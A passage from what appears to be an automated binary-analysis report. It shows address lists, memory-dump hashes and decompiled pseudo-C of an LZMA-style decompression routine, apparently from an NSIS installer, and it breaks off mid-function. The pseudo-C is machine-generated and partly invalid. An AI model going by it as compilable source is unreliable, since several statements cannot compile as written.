                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • Opcode ID: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                                                          • Instruction ID: c975835c63a62796fcb7e955cfffcd5e326eaa1512836fcadbce1623bdfadb04
                                                                                                                          • Opcode Fuzzy Hash: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                                                          • Instruction Fuzzy Hash: AF816671D00229CFDF24CFA8C8447AEBBB1FB44305F25816AD856BB281C7789A86DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00405DF9(void* __ecx) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				unsigned int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v95;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				intOrPtr _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				void _v140;
                                                                                                                          				void* _v148;
                                                                                                                          				signed int _t537;
                                                                                                                          				signed int _t538;
                                                                                                                          				signed int _t572;
                                                                                                                          
                                                                                                                          				_t572 = 0x22;
                                                                                                                          				_v148 = __ecx;
                                                                                                                          				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                          				if(_v52 == 0xffffffff) {
                                                                                                                          					return 1;
                                                                                                                          				}
                                                                                                                          				while(1) {
                                                                                                                          					L3:
                                                                                                                          					_t537 = _v140;
                                                                                                                          					if(_t537 > 0x1c) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					switch( *((intOrPtr*)(_t537 * 4 +  &M0040684B))) {
                                                                                                                          						case 0:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v116 = _v116 + 1;
                                                                                                                          							_t537 =  *_v116;
                                                                                                                          							__eflags = _t537 - 0xe1;
                                                                                                                          							if(_t537 > 0xe1) {
                                                                                                                          								goto L174;
                                                                                                                          							}
                                                                                                                          							_t542 = _t537 & 0x000000ff;
                                                                                                                          							_push(0x2d);
                                                                                                                          							asm("cdq");
                                                                                                                          							_pop(_t576);
                                                                                                                          							_push(9);
                                                                                                                          							_pop(_t577);
                                                                                                                          							_t622 = _t542 / _t576;
                                                                                                                          							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                          							asm("cdq");
                                                                                                                          							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                          							_v64 = _t617;
                                                                                                                          							_v32 = (1 << _t622) - 1;
                                                                                                                          							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                          							__eflags = 0x600 - _v124;
                                                                                                                          							if(0x600 == _v124) {
                                                                                                                          								L12:
                                                                                                                          								__eflags = _t625;
                                                                                                                          								if(_t625 == 0) {
                                                                                                                          									L14:
                                                                                                                          									_v76 = _v76 & 0x00000000;
                                                                                                                          									_v68 = _v68 & 0x00000000;
                                                                                                                          									goto L17;
                                                                                                                          								} else {
                                                                                                                          									goto L13;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L13:
                                                                                                                          									_t625 = _t625 - 1;
                                                                                                                          									__eflags = _t625;
                                                                                                                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                          								} while (_t625 != 0);
                                                                                                                          								goto L14;
                                                                                                                          							}
                                                                                                                          							__eflags = _v8;
                                                                                                                          							if(_v8 != 0) {
                                                                                                                          								GlobalFree(_v8);
                                                                                                                          							}
                                                                                                                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          							__eflags = _t537;
                                                                                                                          							_v8 = _t537;
                                                                                                                          							if(_t537 == 0) {
                                                                                                                          								goto L174;
                                                                                                                          							} else {
                                                                                                                          								_v124 = 0x600;
                                                                                                                          								goto L12;
                                                                                                                          							}
                                                                                                                          						case 1:
                                                                                                                          							L15:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 1;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                          							_v116 = _v116 + 1;
                                                                                                                          							_t50 =  &_v76;
                                                                                                                          							 *_t50 = _v76 + 1;
                                                                                                                          							__eflags =  *_t50;
                                                                                                                          							L17:
                                                                                                                          							__eflags = _v76 - 4;
                                                                                                                          							if(_v76 < 4) {
                                                                                                                          								goto L15;
                                                                                                                          							}
                                                                                                                          							_t550 = _v68;
                                                                                                                          							__eflags = _t550 - _v120;
                                                                                                                          							if(_t550 == _v120) {
                                                                                                                          								L22:
                                                                                                                          								_v76 = 5;
                                                                                                                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                          								goto L25;
                                                                                                                          							}
                                                                                                                          							__eflags = _v12;
                                                                                                                          							_v120 = _t550;
                                                                                                                          							if(_v12 != 0) {
                                                                                                                          								GlobalFree(_v12); // executed
                                                                                                                          							}
                                                                                                                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                          							__eflags = _t537;
                                                                                                                          							_v12 = _t537;
                                                                                                                          							if(_t537 == 0) {
                                                                                                                          								goto L174;
                                                                                                                          							} else {
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          						case 2:
                                                                                                                          							L26:
                                                                                                                          							_t557 = _v100 & _v32;
                                                                                                                          							_v136 = 6;
                                                                                                                          							_v80 = _t557;
                                                                                                                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                          							goto L135;
                                                                                                                          						case 3:
                                                                                                                          							L23:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 3;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_t72 =  &_v116;
                                                                                                                          							 *_t72 = _v116 + 1;
                                                                                                                          							__eflags =  *_t72;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L25:
                                                                                                                          							_v76 = _v76 - 1;
                                                                                                                          							__eflags = _v76;
                                                                                                                          							if(_v76 != 0) {
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							goto L26;
                                                                                                                          						case 4:
                                                                                                                          							L136:
                                                                                                                          							_t559 =  *_t626;
                                                                                                                          							_t610 = _t559 & 0x0000ffff;
                                                                                                                          							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                          							__eflags = _v16 - _t591;
                                                                                                                          							if(_v16 >= _t591) {
                                                                                                                          								_v20 = _v20 - _t591;
                                                                                                                          								_v16 = _v16 - _t591;
                                                                                                                          								_v68 = 1;
                                                                                                                          								_t560 = _t559 - (_t559 >> 5);
                                                                                                                          								__eflags = _t560;
                                                                                                                          								 *_t626 = _t560;
                                                                                                                          							} else {
                                                                                                                          								_v20 = _t591;
                                                                                                                          								_v68 = _v68 & 0x00000000;
                                                                                                                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                          							}
                                                                                                                          							__eflags = _v20 - 0x1000000;
                                                                                                                          							if(_v20 >= 0x1000000) {
                                                                                                                          								goto L142;
                                                                                                                          							} else {
                                                                                                                          								goto L140;
                                                                                                                          							}
                                                                                                                          						case 5:
                                                                                                                          							L140:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 5;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_t464 =  &_v116;
                                                                                                                          							 *_t464 = _v116 + 1;
                                                                                                                          							__eflags =  *_t464;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L142:
                                                                                                                          							_t561 = _v136;
                                                                                                                          							goto L143;
                                                                                                                          						case 6:
                                                                                                                          							__edx = 0;
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__eax = _v8;
                                                                                                                          								__ecx = _v60;
                                                                                                                          								_v56 = 1;
                                                                                                                          								_v136 = 7;
                                                                                                                          								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                                                          								goto L135;
                                                                                                                          							}
                                                                                                                          							__eax = _v96 & 0x000000ff;
                                                                                                                          							__esi = _v100;
                                                                                                                          							__cl = 8;
                                                                                                                          							__cl = 8 - _v64;
                                                                                                                          							__esi = _v100 & _v28;
                                                                                                                          							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                                                          							__ecx = _v64;
                                                                                                                          							__esi = (_v100 & _v28) << 8;
                                                                                                                          							__ecx = _v8;
                                                                                                                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                                                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                                                          							__eflags = _v60 - 4;
                                                                                                                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                          							if(_v60 >= 4) {
                                                                                                                          								__eflags = _v60 - 0xa;
                                                                                                                          								if(_v60 >= 0xa) {
                                                                                                                          									_t103 =  &_v60;
                                                                                                                          									 *_t103 = _v60 - 6;
                                                                                                                          									__eflags =  *_t103;
                                                                                                                          								} else {
                                                                                                                          									_v60 = _v60 - 3;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_v60 = 0;
                                                                                                                          							}
                                                                                                                          							__eflags = _v56 - __edx;
                                                                                                                          							if(_v56 == __edx) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								__ebx = 1;
                                                                                                                          								goto L63;
                                                                                                                          							}
                                                                                                                          							__eax = _v24;
                                                                                                                          							__eax = _v24 - _v48;
                                                                                                                          							__eflags = __eax - _v120;
                                                                                                                          							if(__eax >= _v120) {
                                                                                                                          								__eax = __eax + _v120;
                                                                                                                          								__eflags = __eax;
                                                                                                                          							}
                                                                                                                          							__ecx = _v12;
                                                                                                                          							__ebx = 0;
                                                                                                                          							__ebx = 1;
                                                                                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          							goto L43;
                                                                                                                          						case 7:
                                                                                                                          							__eflags = _v68 - 1;
                                                                                                                          							if(_v68 != 1) {
                                                                                                                          								__eax = _v40;
                                                                                                                          								_v132 = 0x16;
                                                                                                                          								_v36 = _v40;
                                                                                                                          								__eax = _v44;
                                                                                                                          								_v40 = _v44;
                                                                                                                          								__eax = _v48;
                                                                                                                          								_v44 = _v48;
                                                                                                                          								__eax = 0;
                                                                                                                          								__eflags = _v60 - 7;
                                                                                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          								__al = __al & 0x000000fd;
                                                                                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								__eax = _v8;
                                                                                                                          								__eax = _v8 + 0x664;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								_v92 = __eax;
                                                                                                                          								goto L71;
                                                                                                                          							}
                                                                                                                          							__eax = _v8;
                                                                                                                          							__ecx = _v60;
                                                                                                                          							_v136 = 8;
                                                                                                                          							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                                                          							goto L135;
                                                                                                                          						case 8:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__eax = _v8;
                                                                                                                          								__ecx = _v60;
                                                                                                                          								_v136 = 0xa;
                                                                                                                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                                                          							} else {
                                                                                                                          								__eax = _v60;
                                                                                                                          								__ecx = _v8;
                                                                                                                          								__eax = _v60 + 0xf;
                                                                                                                          								_v136 = 9;
                                                                                                                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                                                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                                                          							}
                                                                                                                          							goto L135;
                                                                                                                          						case 9:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								goto L92;
                                                                                                                          							}
                                                                                                                          							__eflags = _v100;
                                                                                                                          							if(_v100 == 0) {
                                                                                                                          								goto L174;
                                                                                                                          							}
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags = _v60 - 7;
                                                                                                                          							_t264 = _v60 - 7 >= 0;
                                                                                                                          							__eflags = _t264;
                                                                                                                          							0 | _t264 = _t264 + _t264 + 9;
                                                                                                                          							_v60 = _t264 + _t264 + 9;
                                                                                                                          							goto L78;
                                                                                                                          						case 0xa:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__eax = _v8;
                                                                                                                          								__ecx = _v60;
                                                                                                                          								_v136 = 0xb;
                                                                                                                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                                                          								goto L135;
                                                                                                                          							}
                                                                                                                          							__eax = _v44;
                                                                                                                          							goto L91;
                                                                                                                          						case 0xb:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__ecx = _v40;
                                                                                                                          								__eax = _v36;
                                                                                                                          								_v36 = _v40;
                                                                                                                          							} else {
                                                                                                                          								__eax = _v40;
                                                                                                                          							}
                                                                                                                          							__ecx = _v44;
                                                                                                                          							_v40 = _v44;
                                                                                                                          							L91:
                                                                                                                          							__ecx = _v48;
                                                                                                                          							_v48 = __eax;
                                                                                                                          							_v44 = _v48;
                                                                                                                          							L92:
                                                                                                                          							__eax = _v8;
                                                                                                                          							_v132 = 0x15;
                                                                                                                          							__eax = _v8 + 0xa68;
                                                                                                                          							_v92 = _v8 + 0xa68;
                                                                                                                          							goto L71;
                                                                                                                          						case 0xc:
                                                                                                                          							L102:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0xc;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t340 =  &_v116;
                                                                                                                          							 *_t340 = _v116 + 1;
                                                                                                                          							__eflags =  *_t340;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							__eax = _v48;
                                                                                                                          							goto L104;
                                                                                                                          						case 0xd:
                                                                                                                          							L39:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0xd;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t127 =  &_v116;
                                                                                                                          							 *_t127 = _v116 + 1;
                                                                                                                          							__eflags =  *_t127;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L41:
                                                                                                                          							__eax = _v68;
                                                                                                                          							__eflags = _v76 - _v68;
                                                                                                                          							if(_v76 != _v68) {
                                                                                                                          								goto L50;
                                                                                                                          							}
                                                                                                                          							__eflags = __ebx - 0x100;
                                                                                                                          							if(__ebx >= 0x100) {
                                                                                                                          								goto L56;
                                                                                                                          							}
                                                                                                                          							L43:
                                                                                                                          							__eax = _v95 & 0x000000ff;
                                                                                                                          							_v95 = _v95 << 1;
                                                                                                                          							__ecx = _v92;
                                                                                                                          							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                          							_v76 = __eax;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__eax = __eax << 8;
                                                                                                                          							__eax = __eax + __ebx;
                                                                                                                          							__esi = _v92 + __eax * 2;
                                                                                                                          							_v20 = _v20 >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							_v88 = __esi;
                                                                                                                          							__edx = __ax & 0x0000ffff;
                                                                                                                          							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                          							__eflags = _v16 - __ecx;
                                                                                                                          							if(_v16 >= __ecx) {
                                                                                                                          								_v20 = _v20 - __ecx;
                                                                                                                          								_v16 = _v16 - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								_v68 = 1;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								__ebx = __ebx + __ebx + 1;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								_v68 = _v68 & 0x00000000;
                                                                                                                          								_v20 = __ecx;
                                                                                                                          								0x800 = 0x800 - __edx;
                                                                                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags = _v20 - 0x1000000;
                                                                                                                          							_v72 = __ebx;
                                                                                                                          							if(_v20 >= 0x1000000) {
                                                                                                                          								goto L41;
                                                                                                                          							} else {
                                                                                                                          								goto L39;
                                                                                                                          							}
                                                                                                                          						case 0xe:
                                                                                                                          							L48:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0xe;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t161 =  &_v116;
                                                                                                                          							 *_t161 = _v116 + 1;
                                                                                                                          							__eflags =  *_t161;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							while(1) {
                                                                                                                          								L50:
                                                                                                                          								__eflags = __ebx - 0x100;
                                                                                                                          								if(__ebx >= 0x100) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax = _v92;
                                                                                                                          								__edx = __ebx + __ebx;
                                                                                                                          								__ecx = _v20;
                                                                                                                          								__esi = __edx + __eax;
                                                                                                                          								__ecx = _v20 >> 0xb;
                                                                                                                          								__ax =  *__esi;
                                                                                                                          								_v88 = __esi;
                                                                                                                          								__edi = __ax & 0x0000ffff;
                                                                                                                          								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                          								__eflags = _v16 - __ecx;
                                                                                                                          								if(_v16 >= __ecx) {
                                                                                                                          									_v20 = _v20 - __ecx;
                                                                                                                          									_v16 = _v16 - __ecx;
                                                                                                                          									__cx = __ax;
                                                                                                                          									_t175 = __edx + 1; // 0x1
                                                                                                                          									__ebx = _t175;
                                                                                                                          									__cx = __ax >> 5;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									 *__esi = __ax;
                                                                                                                          								} else {
                                                                                                                          									_v20 = __ecx;
                                                                                                                          									0x800 = 0x800 - __edi;
                                                                                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          									__ebx = __ebx + __ebx;
                                                                                                                          									 *__esi = __cx;
                                                                                                                          								}
                                                                                                                          								__eflags = _v20 - 0x1000000;
                                                                                                                          								_v72 = __ebx;
                                                                                                                          								if(_v20 >= 0x1000000) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L48;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L56:
                                                                                                                          							_t178 =  &_v56;
                                                                                                                          							 *_t178 = _v56 & 0x00000000;
                                                                                                                          							__eflags =  *_t178;
                                                                                                                          							goto L57;
                                                                                                                          						case 0xf:
                                                                                                                          							L60:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0xf;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t208 =  &_v116;
                                                                                                                          							 *_t208 = _v116 + 1;
                                                                                                                          							__eflags =  *_t208;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L62:
                                                                                                                          							__eflags = __ebx - 0x100;
                                                                                                                          							if(__ebx >= 0x100) {
                                                                                                                          								L57:
                                                                                                                          								__al = _v72;
                                                                                                                          								_v96 = _v72;
                                                                                                                          								goto L58;
                                                                                                                          							}
                                                                                                                          							L63:
                                                                                                                          							__eax = _v92;
                                                                                                                          							__edx = __ebx + __ebx;
                                                                                                                          							__ecx = _v20;
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							__ecx = _v20 >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							_v88 = __esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                          							__eflags = _v16 - __ecx;
                                                                                                                          							if(_v16 >= __ecx) {
                                                                                                                          								_v20 = _v20 - __ecx;
                                                                                                                          								_v16 = _v16 - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								_t222 = __edx + 1; // 0x1
                                                                                                                          								__ebx = _t222;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								_v20 = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags = _v20 - 0x1000000;
                                                                                                                          							_v72 = __ebx;
                                                                                                                          							if(_v20 >= 0x1000000) {
                                                                                                                          								goto L62;
                                                                                                                          							} else {
                                                                                                                          								goto L60;
                                                                                                                          							}
                                                                                                                          						case 0x10:
                                                                                                                          							L112:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0x10;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t371 =  &_v116;
                                                                                                                          							 *_t371 = _v116 + 1;
                                                                                                                          							__eflags =  *_t371;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							goto L114;
                                                                                                                          						case 0x11:
                                                                                                                          							L71:
                                                                                                                          							__esi = _v92;
